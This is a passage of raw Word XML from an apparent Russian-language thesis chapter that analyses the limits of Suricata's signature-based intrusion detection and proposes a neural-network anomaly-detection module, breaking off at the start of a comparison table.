        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00EB1A47">
        <w:t>Анализ существующих моделей и методов обнаружения атак</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1105A408" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00AF539D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F84D4A" w14:textId="77777777" w:rsidR="00245CF1" w:rsidRDefault="008E0171" w:rsidP="00AF539D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C103F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В современных условиях эксплуатации систем обнаружения вторжений критически важным является комплексный подход к обеспечению безопасности сетевой инфраструктуры. Существующие решения, такие как стандартная </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C103F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C103F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, зачастую реализуют защиту фрагментарно, а не комплексно, ограничиваясь сигнатурным анализом и сбором метаданных без должного внимания к защите самих собираемых данных. Такой подход не обеспечивает сквозной</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C103F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>защиты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C103F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>жизненного</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C103F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цикла</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C103F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>информации.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268622F" w14:textId="3E36F01C" w:rsidR="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00AF539D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C022BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Несмотря на широкое распространение сигнатурного подхода, он обладает рядом принципиальных ограничений. Во-первых, система способна обнаруживать только те угрозы, для которых заранее созданы правила — любая новая или модифицированная атака остаётся незамеченной до момента обновления базы сигнатур. Во-вторых, злоумышленник может намеренно изменить характеристики трафика таким образом, чтобы обойти известные сигнатуры, сохранив при этом вредоносную нагрузку. В-третьих, сигнатурный анализ не позволяет выявлять аномальное поведение, которое само по себе не содержит известных признаков атаки, но статистически отличается от нормального трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F274D" w14:textId="2802B8D7" w:rsidR="008E0171" w:rsidRDefault="00245CF1" w:rsidP="00E27915">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для понимания ограничений существующего подхода необходимо рассмотреть внутреннюю архитектуру стандартной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и принцип её работы. Система функционирует как пассивный анализатор сетевого трафика — она перехватывает пакеты на сетевом интерфейсе и последовательно обрабатывает их на нескольких уровнях. На первом этапе выполняется декодирование протоколов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> извлекая данные прикладного уровня. Полученная полезная нагрузка передаётся в модуль сигнатурного анализа, который сопоставляет трафик с базой известных паттернов вредоносного трафика. Итоговые данные записываются в журнал в формате </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для последующей обработки. Схема данного процесса представлена на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00E27915">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD768AE" w14:textId="3F3A989A" w:rsidR="00E27915" w:rsidRDefault="00E27915" w:rsidP="00ED4CBB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>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2098605" wp14:editId="55F5C774">
            <wp:extent cx="5505450" cy="6281508"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="62098081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80811" name="Рисунок 620980811"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1548" t="2595" r="5158" b="8124"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5510982" cy="6287820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026B475" w14:textId="2EA2B1B5" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00AF539D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>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7C1383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Работа стандартной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D459E56" w14:textId="77777777" w:rsidR="00245CF1" w:rsidRPr="00245CF1" w:rsidRDefault="00245CF1" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E5B02B" w14:textId="2E7F641F" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63312">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Как видно из рисунка </w:t>
      </w:r>
      <w:r w:rsidR="007C1383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63312">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, стандартный подход эффективен для обнаружения известных угроз, однако он ограничен рамками своей базы сигнатур и не способен выявлять новые, ранее не встречавшиеся аномалии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C48A2" w14:textId="2FE68EBF" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00E27915">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5AA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для преодоления указанных ограничений предлагается разработка специализированного нейросетевого модуля</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, архитектура предлагаемого решения показана на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="007C1383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00B41DBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, синим выделено то, что предлагается доработать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B1BBC" w14:textId="599FBE54" w:rsidR="008E0171" w:rsidRDefault="00B41DBA" w:rsidP="00ED4CBB">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B41DBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60558E7B" wp14:editId="6CDF8332">
            <wp:extent cx="6156325" cy="6139180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1461371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71689" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6156325" cy="6139180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743CD93" w14:textId="6265DEDE" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00ED4CB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7C1383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Архитектура предлагаемого решения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F323573" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C103F8" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74396DB1" w14:textId="0829286C" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31478">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Предлагаемая архитектура сохраняет стандартный конвейер обработки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D31478">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D31478">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, но дополняет его отдельным нейросетевым модулем. Данные из файла передаются в сервис, выполняющий парсинг, векторизацию и анализ с помощью обученной нейронной сети. Результатом работы модуля является выявление и классификация аномалий с последующей генерацией дополнительных логов и уведомлением администратора</w:t>
      </w:r>
      <w:r w:rsidR="00C022BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60706331" w14:textId="7014010C" w:rsidR="002E66B7" w:rsidRDefault="008E0171" w:rsidP="00C022BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA46DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Современные методы обнаружения атак классифицируются по принципу формирования детектирующих правил и типу анализируемых данных. Основные подходы представлены в таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA46DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FB729" w14:textId="77777777" w:rsidR="00E27915" w:rsidRDefault="00E27915" w:rsidP="00C022BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194B24E7" w14:textId="0A4DA99B" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сравнение </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA46DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>основных подходов к обнаружению вторжений</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9609" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3861"/>
        <w:gridCol w:w="1853"/>
        <w:gridCol w:w="1913"/>
        <w:gridCol w:w="1982"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="3C06749A" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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D36F6E"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Критерий сравнения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3466D409"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 xml:space="preserve">Сигнатурный анализ </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E12785"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Анализ на аномалии</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43B619BE"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Гибридный подход</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="6CAED6B2" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3861" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EB404F8"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Точность для известных атак</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
